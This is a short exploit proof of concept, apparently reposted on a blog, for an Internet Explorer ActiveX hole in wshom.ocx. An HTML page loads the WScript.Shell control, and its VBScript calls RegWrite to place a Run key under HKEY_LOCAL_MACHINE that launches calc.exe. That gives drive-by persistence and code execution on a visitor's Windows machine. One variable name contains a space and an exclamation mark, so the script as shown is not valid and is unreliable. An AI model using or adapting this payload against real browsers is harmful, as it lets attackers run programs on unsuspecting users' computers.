IE wshom.ocx ActiveX remote code Execution 2 (insecure method)

<html> 
<object classid=’clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’ id=’target’ ></object> 
<script language=’vbscript’> 
targetFile = "c:\WINDOWS\system32\wshom.ocx" 
prototype  = "Sub RegWrite ( ByVal Name As String ,  ByRef Value As Variant ,  [ ByRef Type As Variant ] )" 
memberName = "RegWrite" 
progid     = "IWshRuntimeLibrary.IWshShell_Class" 
argCount   = 3 
D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" 
germaya_x="C:\WINDOWS\system32\calc.exe" 
his0k4="REG_SZ" 
target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4
 </script>

发表评论?

0 条评论。

发表评论